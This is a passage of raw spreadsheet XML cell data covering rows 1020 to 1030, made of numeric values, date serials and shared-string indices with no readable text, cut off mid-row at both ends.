        <v>0</v>
      </c>
      <c r="X1020">
        <v>0</v>
      </c>
      <c r="Y1020">
        <v>0</v>
      </c>
      <c r="Z1020">
        <v>0</v>
      </c>
      <c r="AA1020">
        <v>0</v>
      </c>
      <c r="AB1020">
        <v>0</v>
      </c>
      <c r="AC1020">
        <v>0</v>
      </c>
      <c r="AD1020">
        <v>0</v>
      </c>
      <c r="AE1020">
        <v>0</v>
      </c>
      <c r="AF1020" t="s">
        <v>7770</v>
      </c>
      <c r="AG1020">
        <v>14450</v>
      </c>
      <c r="AH1020">
        <v>12</v>
      </c>
      <c r="AJ1020">
        <v>160</v>
      </c>
      <c r="AK1020" t="s">
        <v>114</v>
      </c>
      <c r="AL1020" t="s">
        <v>115</v>
      </c>
      <c r="AM1020" t="s">
        <v>7771</v>
      </c>
      <c r="AN1020" t="s">
        <v>55</v>
      </c>
      <c r="AO1020">
        <v>2020</v>
      </c>
      <c r="AP1020" t="s">
        <v>7772</v>
      </c>
      <c r="AQ1020" t="s">
        <v>7773</v>
      </c>
      <c r="AR1020" t="s">
        <v>7770</v>
      </c>
      <c r="AS1020" t="s">
        <v>179</v>
      </c>
      <c r="AT1020" t="s">
        <v>58</v>
      </c>
      <c r="AU1020">
        <v>0</v>
      </c>
      <c r="AV1020">
        <v>0</v>
      </c>
      <c r="AW1020">
        <v>4</v>
      </c>
      <c r="AX1020">
        <v>1</v>
      </c>
      <c r="AY1020">
        <v>1</v>
      </c>
      <c r="AZ1020">
        <v>2</v>
      </c>
      <c r="BA1020" t="s">
        <v>17300</v>
      </c>
      <c r="BB1020" t="s">
        <v>17536</v>
      </c>
      <c r="BC1020">
        <v>0</v>
      </c>
      <c r="BD1020">
        <v>0</v>
      </c>
    </row>
    <row r="1021" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1021">
        <v>4906</v>
      </c>
      <c r="B1021" t="s">
        <v>5329</v>
      </c>
      <c r="C1021" t="s">
        <v>157</v>
      </c>
      <c r="D1021" t="s">
        <v>7774</v>
      </c>
      <c r="E1021" t="s">
        <v>1206</v>
      </c>
      <c r="F1021" t="s">
        <v>1207</v>
      </c>
      <c r="G1021" s="1">
        <v>44183</v>
      </c>
      <c r="H1021">
        <v>6644</v>
      </c>
      <c r="I1021">
        <v>6644</v>
      </c>
      <c r="J1021">
        <v>0</v>
      </c>
      <c r="K1021">
        <v>1</v>
      </c>
      <c r="L1021">
        <v>0</v>
      </c>
      <c r="M1021">
        <v>0</v>
      </c>
      <c r="N1021">
        <v>0</v>
      </c>
      <c r="O1021">
        <v>0</v>
      </c>
      <c r="P1021">
        <v>0</v>
      </c>
      <c r="Q1021">
        <v>7</v>
      </c>
      <c r="R1021">
        <v>8</v>
      </c>
      <c r="S1021">
        <v>0</v>
      </c>
      <c r="T1021">
        <v>1</v>
      </c>
      <c r="U1021">
        <v>0</v>
      </c>
      <c r="V1021">
        <v>26000</v>
      </c>
      <c r="W1021">
        <v>0</v>
      </c>
      <c r="X1021">
        <v>0</v>
      </c>
      <c r="Y1021">
        <v>0</v>
      </c>
      <c r="Z1021">
        <v>0</v>
      </c>
      <c r="AA1021">
        <v>0</v>
      </c>
      <c r="AB1021">
        <v>100</v>
      </c>
      <c r="AC1021">
        <v>1000</v>
      </c>
      <c r="AD1021">
        <v>0</v>
      </c>
      <c r="AE1021">
        <v>20000</v>
      </c>
      <c r="AF1021" t="s">
        <v>7775</v>
      </c>
      <c r="AG1021">
        <v>68483</v>
      </c>
      <c r="AH1021">
        <v>16</v>
      </c>
      <c r="AJ1021">
        <v>237</v>
      </c>
      <c r="AK1021" t="s">
        <v>7776</v>
      </c>
      <c r="AL1021" t="s">
        <v>7777</v>
      </c>
      <c r="AM1021" t="s">
        <v>7778</v>
      </c>
      <c r="AN1021" t="s">
        <v>55</v>
      </c>
      <c r="AO1021">
        <v>2011</v>
      </c>
      <c r="AP1021" t="s">
        <v>7779</v>
      </c>
      <c r="AQ1021" t="s">
        <v>7780</v>
      </c>
      <c r="AR1021" t="s">
        <v>7775</v>
      </c>
      <c r="AS1021" t="s">
        <v>71</v>
      </c>
      <c r="AT1021" t="s">
        <v>58</v>
      </c>
      <c r="AU1021">
        <v>26</v>
      </c>
      <c r="AV1021">
        <v>1</v>
      </c>
      <c r="AW1021">
        <v>7</v>
      </c>
      <c r="AX1021">
        <v>15</v>
      </c>
      <c r="AY1021">
        <v>2</v>
      </c>
      <c r="AZ1021">
        <v>8</v>
      </c>
      <c r="BA1021" t="s">
        <v>17015</v>
      </c>
      <c r="BB1021">
        <v>0</v>
      </c>
      <c r="BC1021">
        <v>0</v>
      </c>
      <c r="BD1021" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="1022" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1022">
        <v>5025</v>
      </c>
      <c r="B1022" t="s">
        <v>7781</v>
      </c>
      <c r="C1022" t="s">
        <v>157</v>
      </c>
      <c r="D1022" t="s">
        <v>7782</v>
      </c>
      <c r="E1022" t="s">
        <v>142</v>
      </c>
      <c r="F1022" t="s">
        <v>5081</v>
      </c>
      <c r="G1022" s="1">
        <v>44137</v>
      </c>
      <c r="H1022">
        <v>6649</v>
      </c>
      <c r="I1022">
        <v>6649</v>
      </c>
      <c r="J1022">
        <v>0</v>
      </c>
      <c r="K1022">
        <v>3</v>
      </c>
      <c r="L1022">
        <v>0</v>
      </c>
      <c r="M1022">
        <v>0</v>
      </c>
      <c r="N1022">
        <v>0</v>
      </c>
      <c r="O1022">
        <v>0</v>
      </c>
      <c r="P1022">
        <v>0</v>
      </c>
      <c r="Q1022">
        <v>0</v>
      </c>
      <c r="R1022">
        <v>0</v>
      </c>
      <c r="S1022">
        <v>0</v>
      </c>
      <c r="T1022">
        <v>0</v>
      </c>
      <c r="U1022">
        <v>0</v>
      </c>
      <c r="V1022">
        <v>200000</v>
      </c>
      <c r="W1022">
        <v>0</v>
      </c>
      <c r="X1022">
        <v>0</v>
      </c>
      <c r="Y1022">
        <v>0</v>
      </c>
      <c r="Z1022">
        <v>0</v>
      </c>
      <c r="AA1022">
        <v>0</v>
      </c>
      <c r="AB1022">
        <v>0</v>
      </c>
      <c r="AC1022">
        <v>0</v>
      </c>
      <c r="AD1022">
        <v>0</v>
      </c>
      <c r="AE1022">
        <v>0</v>
      </c>
      <c r="AF1022" t="s">
        <v>7783</v>
      </c>
      <c r="AG1022">
        <v>62271</v>
      </c>
      <c r="AH1022">
        <v>16</v>
      </c>
      <c r="AJ1022">
        <v>251</v>
      </c>
      <c r="AK1022" t="s">
        <v>6830</v>
      </c>
      <c r="AL1022" t="s">
        <v>6831</v>
      </c>
      <c r="AM1022" t="s">
        <v>7784</v>
      </c>
      <c r="AN1022" t="s">
        <v>68</v>
      </c>
      <c r="AO1022">
        <v>2020</v>
      </c>
      <c r="AP1022">
        <v>85645768448</v>
      </c>
      <c r="AQ1022" t="s">
        <v>2378</v>
      </c>
      <c r="AR1022" t="s">
        <v>7783</v>
      </c>
      <c r="AS1022" t="s">
        <v>179</v>
      </c>
      <c r="AT1022" t="s">
        <v>72</v>
      </c>
      <c r="AU1022">
        <v>0</v>
      </c>
      <c r="AV1022">
        <v>0</v>
      </c>
      <c r="AW1022">
        <v>3</v>
      </c>
      <c r="AX1022">
        <v>0</v>
      </c>
      <c r="AY1022">
        <v>1</v>
      </c>
      <c r="AZ1022">
        <v>1</v>
      </c>
      <c r="BA1022" t="s">
        <v>17542</v>
      </c>
      <c r="BB1022" t="s">
        <v>17543</v>
      </c>
      <c r="BC1022" t="s">
        <v>9738</v>
      </c>
      <c r="BD1022" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="1023" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1023">
        <v>5031</v>
      </c>
      <c r="B1023" t="s">
        <v>4926</v>
      </c>
      <c r="C1023" t="s">
        <v>477</v>
      </c>
      <c r="D1023" t="s">
        <v>7785</v>
      </c>
      <c r="E1023" t="s">
        <v>142</v>
      </c>
      <c r="F1023" t="s">
        <v>666</v>
      </c>
      <c r="G1023" s="1">
        <v>44126</v>
      </c>
      <c r="H1023">
        <v>6678</v>
      </c>
      <c r="AF1023" t="s">
        <v>7786</v>
      </c>
      <c r="AG1023">
        <v>95372</v>
      </c>
      <c r="AH1023">
        <v>29</v>
      </c>
      <c r="AJ1023">
        <v>376</v>
      </c>
      <c r="AK1023" t="s">
        <v>5334</v>
      </c>
      <c r="AL1023" t="s">
        <v>7787</v>
      </c>
      <c r="AM1023" t="s">
        <v>7788</v>
      </c>
      <c r="AN1023" t="s">
        <v>55</v>
      </c>
      <c r="AO1023">
        <v>2016</v>
      </c>
      <c r="AP1023">
        <v>82147455897</v>
      </c>
      <c r="AQ1023">
        <v>82147455897</v>
      </c>
      <c r="AR1023" t="s">
        <v>7786</v>
      </c>
      <c r="AS1023" t="s">
        <v>71</v>
      </c>
      <c r="AT1023" t="s">
        <v>58</v>
      </c>
      <c r="AU1023">
        <v>0</v>
      </c>
      <c r="AV1023">
        <v>0</v>
      </c>
      <c r="AW1023">
        <v>20</v>
      </c>
      <c r="AX1023">
        <v>10</v>
      </c>
      <c r="AY1023">
        <v>1</v>
      </c>
      <c r="AZ1023">
        <v>1</v>
      </c>
      <c r="BA1023" t="s">
        <v>17147</v>
      </c>
      <c r="BB1023">
        <v>0</v>
      </c>
      <c r="BC1023" t="s">
        <v>9536</v>
      </c>
      <c r="BD1023">
        <v>0</v>
      </c>
    </row>
    <row r="1024" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1024">
        <v>5004</v>
      </c>
      <c r="B1024" t="s">
        <v>167</v>
      </c>
      <c r="C1024" t="s">
        <v>88</v>
      </c>
      <c r="D1024" t="s">
        <v>7789</v>
      </c>
      <c r="E1024" t="s">
        <v>3643</v>
      </c>
      <c r="F1024" t="s">
        <v>7790</v>
      </c>
      <c r="G1024" s="1">
        <v>44182</v>
      </c>
      <c r="H1024">
        <v>6697</v>
      </c>
      <c r="I1024">
        <v>6697</v>
      </c>
      <c r="J1024">
        <v>2</v>
      </c>
      <c r="K1024">
        <v>1</v>
      </c>
      <c r="L1024">
        <v>0</v>
      </c>
      <c r="M1024">
        <v>0</v>
      </c>
      <c r="N1024">
        <v>0</v>
      </c>
      <c r="O1024">
        <v>0</v>
      </c>
      <c r="P1024">
        <v>0</v>
      </c>
      <c r="Q1024">
        <v>0</v>
      </c>
      <c r="R1024">
        <v>0</v>
      </c>
      <c r="S1024">
        <v>0</v>
      </c>
      <c r="T1024">
        <v>5</v>
      </c>
      <c r="U1024">
        <v>12000</v>
      </c>
      <c r="V1024">
        <v>60000</v>
      </c>
      <c r="W1024">
        <v>0</v>
      </c>
      <c r="X1024">
        <v>0</v>
      </c>
      <c r="Y1024">
        <v>0</v>
      </c>
      <c r="Z1024">
        <v>0</v>
      </c>
      <c r="AA1024">
        <v>0</v>
      </c>
      <c r="AB1024">
        <v>0</v>
      </c>
      <c r="AC1024">
        <v>0</v>
      </c>
      <c r="AD1024">
        <v>0</v>
      </c>
      <c r="AE1024">
        <v>345000</v>
      </c>
      <c r="AF1024" t="s">
        <v>7791</v>
      </c>
      <c r="AG1024">
        <v>80117</v>
      </c>
      <c r="AH1024">
        <v>17</v>
      </c>
      <c r="AJ1024">
        <v>282</v>
      </c>
      <c r="AK1024" t="s">
        <v>2842</v>
      </c>
      <c r="AL1024" t="s">
        <v>7792</v>
      </c>
      <c r="AM1024" t="s">
        <v>7793</v>
      </c>
      <c r="AN1024" t="s">
        <v>55</v>
      </c>
      <c r="AO1024">
        <v>1989</v>
      </c>
      <c r="AP1024" t="s">
        <v>7794</v>
      </c>
      <c r="AQ1024">
        <v>89685490715</v>
      </c>
      <c r="AR1024" t="s">
        <v>7795</v>
      </c>
      <c r="AS1024" t="s">
        <v>179</v>
      </c>
      <c r="AT1024" t="s">
        <v>58</v>
      </c>
      <c r="AU1024">
        <v>6</v>
      </c>
      <c r="AV1024">
        <v>1</v>
      </c>
      <c r="AW1024">
        <v>0</v>
      </c>
      <c r="AX1024">
        <v>0</v>
      </c>
      <c r="AY1024">
        <v>45</v>
      </c>
      <c r="AZ1024">
        <v>31</v>
      </c>
      <c r="BA1024" t="s">
        <v>17156</v>
      </c>
      <c r="BB1024" t="s">
        <v>17537</v>
      </c>
      <c r="BC1024" t="s">
        <v>12394</v>
      </c>
      <c r="BD1024">
        <v>0</v>
      </c>
    </row>
    <row r="1025" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1025">
        <v>5030</v>
      </c>
      <c r="B1025" t="s">
        <v>7796</v>
      </c>
      <c r="C1025" t="s">
        <v>318</v>
      </c>
      <c r="D1025" t="s">
        <v>7797</v>
      </c>
      <c r="E1025" t="s">
        <v>111</v>
      </c>
      <c r="F1025" t="s">
        <v>7798</v>
      </c>
      <c r="G1025" s="1">
        <v>44258</v>
      </c>
      <c r="H1025">
        <v>6724</v>
      </c>
      <c r="I1025">
        <v>6724</v>
      </c>
      <c r="J1025">
        <v>0</v>
      </c>
      <c r="K1025">
        <v>1</v>
      </c>
      <c r="L1025">
        <v>1</v>
      </c>
      <c r="M1025">
        <v>0</v>
      </c>
      <c r="N1025">
        <v>0</v>
      </c>
      <c r="O1025">
        <v>0</v>
      </c>
      <c r="P1025">
        <v>0</v>
      </c>
      <c r="Q1025">
        <v>0</v>
      </c>
      <c r="R1025">
        <v>0</v>
      </c>
      <c r="S1025">
        <v>0</v>
      </c>
      <c r="T1025">
        <v>1</v>
      </c>
      <c r="U1025">
        <v>0</v>
      </c>
      <c r="V1025">
        <v>100000</v>
      </c>
      <c r="W1025">
        <v>3000000</v>
      </c>
      <c r="X1025">
        <v>0</v>
      </c>
      <c r="Y1025">
        <v>0</v>
      </c>
      <c r="Z1025">
        <v>0</v>
      </c>
      <c r="AA1025">
        <v>0</v>
      </c>
      <c r="AB1025">
        <v>0</v>
      </c>
      <c r="AC1025">
        <v>0</v>
      </c>
      <c r="AD1025">
        <v>0</v>
      </c>
      <c r="AE1025">
        <v>10000</v>
      </c>
      <c r="AF1025" t="s">
        <v>7799</v>
      </c>
      <c r="AG1025">
        <v>90241</v>
      </c>
      <c r="AH1025">
        <v>26</v>
      </c>
      <c r="AJ1025">
        <v>420</v>
      </c>
      <c r="AK1025" t="s">
        <v>331</v>
      </c>
      <c r="AL1025" t="s">
        <v>7800</v>
      </c>
      <c r="AM1025" t="s">
        <v>7801</v>
      </c>
      <c r="AN1025" t="s">
        <v>55</v>
      </c>
      <c r="AO1025">
        <v>2018</v>
      </c>
      <c r="AP1025">
        <v>811442028</v>
      </c>
      <c r="AQ1025" t="s">
        <v>7802</v>
      </c>
      <c r="AR1025" t="s">
        <v>7799</v>
      </c>
      <c r="AS1025" t="s">
        <v>71</v>
      </c>
      <c r="AT1025" t="s">
        <v>58</v>
      </c>
      <c r="AU1025">
        <v>0</v>
      </c>
      <c r="AV1025">
        <v>0</v>
      </c>
      <c r="AW1025">
        <v>2</v>
      </c>
      <c r="AX1025">
        <v>2</v>
      </c>
      <c r="AY1025">
        <v>2</v>
      </c>
      <c r="AZ1025">
        <v>2</v>
      </c>
      <c r="BA1025" t="s">
        <v>17544</v>
      </c>
      <c r="BB1025" t="s">
        <v>17547</v>
      </c>
      <c r="BC1025" t="s">
        <v>9536</v>
      </c>
      <c r="BD1025" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="1026" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1026">
        <v>4827</v>
      </c>
      <c r="B1026" t="s">
        <v>7803</v>
      </c>
      <c r="C1026" t="s">
        <v>224</v>
      </c>
      <c r="D1026" t="s">
        <v>7804</v>
      </c>
      <c r="E1026" t="s">
        <v>142</v>
      </c>
      <c r="F1026" t="s">
        <v>143</v>
      </c>
      <c r="G1026" s="1">
        <v>44218</v>
      </c>
      <c r="H1026">
        <v>6772</v>
      </c>
      <c r="I1026">
        <v>6772</v>
      </c>
      <c r="J1026">
        <v>0</v>
      </c>
      <c r="K1026">
        <v>0</v>
      </c>
      <c r="L1026">
        <v>0</v>
      </c>
      <c r="M1026">
        <v>0</v>
      </c>
      <c r="N1026">
        <v>0</v>
      </c>
      <c r="O1026">
        <v>0</v>
      </c>
      <c r="P1026">
        <v>0</v>
      </c>
      <c r="Q1026">
        <v>1</v>
      </c>
      <c r="R1026">
        <v>0</v>
      </c>
      <c r="S1026">
        <v>0</v>
      </c>
      <c r="T1026">
        <v>0</v>
      </c>
      <c r="U1026">
        <v>0</v>
      </c>
      <c r="V1026">
        <v>0</v>
      </c>
      <c r="W1026">
        <v>0</v>
      </c>
      <c r="X1026">
        <v>0</v>
      </c>
      <c r="Y1026">
        <v>0</v>
      </c>
      <c r="Z1026">
        <v>0</v>
      </c>
      <c r="AA1026">
        <v>0</v>
      </c>
      <c r="AB1026">
        <v>10</v>
      </c>
      <c r="AC1026">
        <v>0</v>
      </c>
      <c r="AD1026">
        <v>0</v>
      </c>
      <c r="AE1026">
        <v>0</v>
      </c>
      <c r="AF1026" t="s">
        <v>7805</v>
      </c>
      <c r="AG1026">
        <v>55584</v>
      </c>
      <c r="AH1026">
        <v>15</v>
      </c>
      <c r="AJ1026">
        <v>226</v>
      </c>
      <c r="AK1026" t="s">
        <v>919</v>
      </c>
      <c r="AL1026" t="s">
        <v>7806</v>
      </c>
      <c r="AM1026" t="s">
        <v>7807</v>
      </c>
      <c r="AN1026" t="s">
        <v>68</v>
      </c>
      <c r="AO1026">
        <v>2012</v>
      </c>
      <c r="AP1026">
        <v>81326189986</v>
      </c>
      <c r="AQ1026" t="s">
        <v>7808</v>
      </c>
      <c r="AR1026" t="s">
        <v>7805</v>
      </c>
      <c r="AS1026" t="s">
        <v>71</v>
      </c>
      <c r="AT1026" t="s">
        <v>72</v>
      </c>
      <c r="AU1026">
        <v>26</v>
      </c>
      <c r="AV1026">
        <v>1</v>
      </c>
      <c r="AW1026">
        <v>0</v>
      </c>
      <c r="AX1026">
        <v>0</v>
      </c>
      <c r="AY1026">
        <v>1</v>
      </c>
      <c r="AZ1026">
        <v>3</v>
      </c>
      <c r="BA1026" t="s">
        <v>17432</v>
      </c>
      <c r="BB1026" t="s">
        <v>16040</v>
      </c>
      <c r="BC1026" t="s">
        <v>12796</v>
      </c>
      <c r="BD1026">
        <v>0</v>
      </c>
    </row>
    <row r="1027" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1027">
        <v>2857</v>
      </c>
      <c r="B1027" t="s">
        <v>7809</v>
      </c>
      <c r="C1027" t="s">
        <v>157</v>
      </c>
      <c r="D1027" t="s">
        <v>7810</v>
      </c>
      <c r="E1027" t="s">
        <v>4304</v>
      </c>
      <c r="F1027" t="s">
        <v>7811</v>
      </c>
      <c r="G1027" s="1">
        <v>44140</v>
      </c>
      <c r="H1027">
        <v>6794</v>
      </c>
      <c r="I1027">
        <v>6794</v>
      </c>
      <c r="J1027">
        <v>2</v>
      </c>
      <c r="K1027">
        <v>1</v>
      </c>
      <c r="L1027">
        <v>0</v>
      </c>
      <c r="M1027">
        <v>6</v>
      </c>
      <c r="N1027">
        <v>0</v>
      </c>
      <c r="O1027">
        <v>0</v>
      </c>
      <c r="P1027">
        <v>0</v>
      </c>
      <c r="Q1027">
        <v>0</v>
      </c>
      <c r="R1027">
        <v>0</v>
      </c>
      <c r="S1027">
        <v>1</v>
      </c>
      <c r="T1027">
        <v>1</v>
      </c>
      <c r="U1027">
        <v>350</v>
      </c>
      <c r="V1027">
        <v>1</v>
      </c>
      <c r="W1027">
        <v>0</v>
      </c>
      <c r="X1027">
        <v>7000</v>
      </c>
      <c r="Y1027">
        <v>0</v>
      </c>
      <c r="Z1027">
        <v>0</v>
      </c>
      <c r="AA1027">
        <v>0</v>
      </c>
      <c r="AB1027">
        <v>0</v>
      </c>
      <c r="AC1027">
        <v>0</v>
      </c>
      <c r="AD1027">
        <v>1</v>
      </c>
      <c r="AE1027">
        <v>15</v>
      </c>
      <c r="AF1027" t="s">
        <v>5216</v>
      </c>
      <c r="AG1027">
        <v>65181</v>
      </c>
      <c r="AH1027">
        <v>16</v>
      </c>
      <c r="AJ1027">
        <v>234</v>
      </c>
      <c r="AK1027" t="s">
        <v>7812</v>
      </c>
      <c r="AL1027" t="s">
        <v>7812</v>
      </c>
      <c r="AM1027" t="s">
        <v>7813</v>
      </c>
      <c r="AN1027" t="s">
        <v>55</v>
      </c>
      <c r="AO1027">
        <v>1992</v>
      </c>
      <c r="AP1027" t="s">
        <v>7814</v>
      </c>
      <c r="AQ1027" t="s">
        <v>7815</v>
      </c>
      <c r="AR1027" t="s">
        <v>7096</v>
      </c>
      <c r="AS1027" t="s">
        <v>71</v>
      </c>
      <c r="AT1027" t="s">
        <v>58</v>
      </c>
      <c r="AU1027">
        <v>25</v>
      </c>
      <c r="AV1027">
        <v>1</v>
      </c>
      <c r="AW1027">
        <v>220</v>
      </c>
      <c r="AX1027">
        <v>366</v>
      </c>
      <c r="AY1027">
        <v>38</v>
      </c>
      <c r="AZ1027">
        <v>18</v>
      </c>
      <c r="BA1027" t="s">
        <v>16653</v>
      </c>
      <c r="BB1027" t="s">
        <v>16080</v>
      </c>
      <c r="BC1027">
        <v>0</v>
      </c>
      <c r="BD1027" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1028" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1028">
        <v>4958</v>
      </c>
      <c r="B1028" t="s">
        <v>7816</v>
      </c>
      <c r="C1028" t="s">
        <v>129</v>
      </c>
      <c r="D1028" t="s">
        <v>7817</v>
      </c>
      <c r="E1028" t="s">
        <v>49</v>
      </c>
      <c r="F1028" t="s">
        <v>7818</v>
      </c>
      <c r="G1028" s="1">
        <v>44210</v>
      </c>
      <c r="H1028">
        <v>6819</v>
      </c>
      <c r="I1028">
        <v>6819</v>
      </c>
      <c r="J1028">
        <v>1</v>
      </c>
      <c r="K1028">
        <v>0</v>
      </c>
      <c r="L1028">
        <v>0</v>
      </c>
      <c r="M1028">
        <v>0</v>
      </c>
      <c r="N1028">
        <v>0</v>
      </c>
      <c r="O1028">
        <v>0</v>
      </c>
      <c r="P1028">
        <v>2</v>
      </c>
      <c r="Q1028">
        <v>3</v>
      </c>
      <c r="R1028">
        <v>0</v>
      </c>
      <c r="S1028">
        <v>0</v>
      </c>
      <c r="T1028">
        <v>2</v>
      </c>
      <c r="U1028">
        <v>50000</v>
      </c>
      <c r="V1028">
        <v>0</v>
      </c>
      <c r="W1028">
        <v>0</v>
      </c>
      <c r="X1028">
        <v>0</v>
      </c>
      <c r="Y1028">
        <v>0</v>
      </c>
      <c r="Z1028">
        <v>0</v>
      </c>
      <c r="AA1028">
        <v>5000</v>
      </c>
      <c r="AB1028">
        <v>500</v>
      </c>
      <c r="AC1028">
        <v>0</v>
      </c>
      <c r="AD1028">
        <v>0</v>
      </c>
      <c r="AE1028">
        <v>10000</v>
      </c>
      <c r="AF1028" t="s">
        <v>7819</v>
      </c>
      <c r="AG1028">
        <v>15312</v>
      </c>
      <c r="AH1028">
        <v>11</v>
      </c>
      <c r="AJ1028">
        <v>270</v>
      </c>
      <c r="AK1028" t="s">
        <v>252</v>
      </c>
      <c r="AL1028" t="s">
        <v>7820</v>
      </c>
      <c r="AM1028" t="s">
        <v>7821</v>
      </c>
      <c r="AN1028" t="s">
        <v>68</v>
      </c>
      <c r="AO1028">
        <v>2018</v>
      </c>
      <c r="AP1028">
        <v>811118681</v>
      </c>
      <c r="AQ1028">
        <v>811118681</v>
      </c>
      <c r="AR1028" t="s">
        <v>7819</v>
      </c>
      <c r="AS1028" t="s">
        <v>71</v>
      </c>
      <c r="AT1028" t="s">
        <v>72</v>
      </c>
      <c r="AU1028">
        <v>26</v>
      </c>
      <c r="AV1028">
        <v>1</v>
      </c>
      <c r="AW1028">
        <v>8</v>
      </c>
      <c r="AX1028">
        <v>20</v>
      </c>
      <c r="AY1028">
        <v>17</v>
      </c>
      <c r="AZ1028">
        <v>5</v>
      </c>
      <c r="BA1028" t="s">
        <v>17513</v>
      </c>
      <c r="BB1028">
        <v>0</v>
      </c>
      <c r="BC1028" t="s">
        <v>12326</v>
      </c>
      <c r="BD1028" t="s">
        <v>12327</v>
      </c>
    </row>
    <row r="1029" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1029">
        <v>5049</v>
      </c>
      <c r="B1029" t="s">
        <v>7822</v>
      </c>
      <c r="C1029" t="s">
        <v>318</v>
      </c>
      <c r="D1029" t="s">
        <v>7823</v>
      </c>
      <c r="E1029" t="s">
        <v>363</v>
      </c>
      <c r="F1029" t="s">
        <v>364</v>
      </c>
      <c r="G1029" s="1">
        <v>44120</v>
      </c>
      <c r="H1029">
        <v>6826</v>
      </c>
      <c r="I1029">
        <v>6826</v>
      </c>
      <c r="J1029">
        <v>0</v>
      </c>
      <c r="K1029">
        <v>0</v>
      </c>
      <c r="L1029">
        <v>0</v>
      </c>
      <c r="M1029">
        <v>0</v>
      </c>
      <c r="N1029">
        <v>0</v>
      </c>
      <c r="O1029">
        <v>0</v>
      </c>
      <c r="P1029">
        <v>0</v>
      </c>
      <c r="Q1029">
        <v>0</v>
      </c>
      <c r="R1029">
        <v>0</v>
      </c>
      <c r="S1029">
        <v>0</v>
      </c>
      <c r="T1029">
        <v>1</v>
      </c>
      <c r="U1029">
        <v>0</v>
      </c>
      <c r="V1029">
        <v>0</v>
      </c>
      <c r="W1029">
        <v>0</v>
      </c>
      <c r="X1029">
        <v>0</v>
      </c>
      <c r="Y1029">
        <v>0</v>
      </c>
      <c r="Z1029">
        <v>0</v>
      </c>
      <c r="AA1029">
        <v>0</v>
      </c>
      <c r="AB1029">
        <v>0</v>
      </c>
      <c r="AC1029">
        <v>0</v>
      </c>
      <c r="AD1029">
        <v>0</v>
      </c>
      <c r="AE1029">
        <v>300000</v>
      </c>
      <c r="AF1029" t="s">
        <v>7824</v>
      </c>
      <c r="AG1029">
        <v>91914</v>
      </c>
      <c r="AH1029">
        <v>26</v>
      </c>
      <c r="AJ1029">
        <v>422</v>
      </c>
      <c r="AK1029" t="s">
        <v>7825</v>
      </c>
      <c r="AL1029" t="s">
        <v>7826</v>
      </c>
      <c r="AM1029" t="s">
        <v>7827</v>
      </c>
      <c r="AN1029" t="s">
        <v>55</v>
      </c>
      <c r="AO1029">
        <v>1991</v>
      </c>
      <c r="AP1029" t="s">
        <v>7828</v>
      </c>
      <c r="AQ1029" t="s">
        <v>7829</v>
      </c>
      <c r="AR1029" t="s">
        <v>7824</v>
      </c>
      <c r="AS1029" t="s">
        <v>371</v>
      </c>
      <c r="AT1029" t="s">
        <v>58</v>
      </c>
      <c r="AU1029">
        <v>26</v>
      </c>
      <c r="AV1029">
        <v>0</v>
      </c>
      <c r="AW1029">
        <v>4</v>
      </c>
      <c r="AX1029">
        <v>20</v>
      </c>
      <c r="AY1029">
        <v>3</v>
      </c>
      <c r="AZ1029">
        <v>2</v>
      </c>
      <c r="BA1029" t="s">
        <v>17551</v>
      </c>
      <c r="BB1029" t="s">
        <v>17555</v>
      </c>
      <c r="BC1029" t="s">
        <v>12269</v>
      </c>
      <c r="BD1029" t="s">
        <v>12270</v>
      </c>
    </row>
    <row r="1030" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1030">
        <v>5020</v>
      </c>
      <c r="B1030" t="s">
        <v>7830</v>
      </c>
      <c r="C1030" t="s">
        <v>3165</v>
      </c>
      <c r="D1030" t="s">
        <v>7831</v>
      </c>
      <c r="E1030" t="s">
        <v>142</v>
      </c>
      <c r="F1030" t="s">
        <v>7832</v>
      </c>
      <c r="G1030" s="1">
        <v>44172</v>
      </c>
      <c r="H1030">
        <v>6843</v>
      </c>
      <c r="I1030">
        <v>6843</v>
      </c>
      <c r="J1030">
        <v>1</v>
      </c>
      <c r="K1030">
        <v>0</v>
      </c>
      <c r="L1030">
        <v>2</v>
      </c>
      <c r="M1030">
        <v>0</v>
      </c>
      <c r="N1030">
        <v>0</v>
      </c>
      <c r="O1030">
        <v>0</v>
      </c>
      <c r="P1030">
        <v>0</v>
      </c>
      <c r="Q1030">
        <v>0</v>
      </c>
      <c r="R1030">
        <v>6</v>
      </c>
      <c r="S1030">
        <v>1</v>
      </c>
      <c r="T1030">
        <v>0</v>
      </c>
      <c r="U1030">
        <v>200000</v>
      </c>
      <c r="V1030">
        <v>0</v>
      </c>
      <c r="W1030">
        <v>5000</v>
      </c>
      <c r="X1030">
        <v>0</v>
      </c>
      <c r="Y1030">
        <v>0</v>
      </c>
      <c r="Z1030">
        <v>0</v>
      </c>
      <c r="AA1030">
        <v>0</v>
      </c>
      <c r="AB1030">
        <v>0</v>
      </c>
      <c r="AC1030">
        <v>1200</v>
      </c>
      <c r="AD1030">
        <v>1</v>
      </c>
      <c r="AE1030">
        <v>0</v>
      </c>
      <c r="AF1030" t="s">
        <v>7833</v>
      </c>
      <c r="AG1030">
        <v>99614</v>
      </c>
      <c r="AH1030">
        <v>34</v>
      </c>
      <c r="AJ1030">
        <v>486</v>
      </c>
      <c r="AK1030" t="s">
        <v>3169</v>
      </c>
      <c r="AL1030" t="s">
        <v>7397</v>
      </c>
      <c r="AM1030" t="s">
        <v>7834</v>
      </c>
      <c r="AN1030" t="s">
        <v>55</v>
      </c>
      <c r="AO1030">
        <v>2017</v>
      </c>
      <c r="AP1030" t="s">
        <v>7835</v>
      </c>
      <c r="AQ1030" t="s">
        <v>7836</v>
      </c>
      <c r="AR1030" t="s">
        <v>7837</v>
      </c>
      <c r="AS1030" t="s">
        <v>71</v>
      </c>
      <c r="AT1030" t="s">
        <v>58</v>
      </c>
      <c r="AU1030">
        <v>25</v>
      </c>
      <c r="AV1030">
        <v>0</v>
      </c>
      <c r="AW1030">
        <v>15</v>
      </c>
      <c r="AX1030">
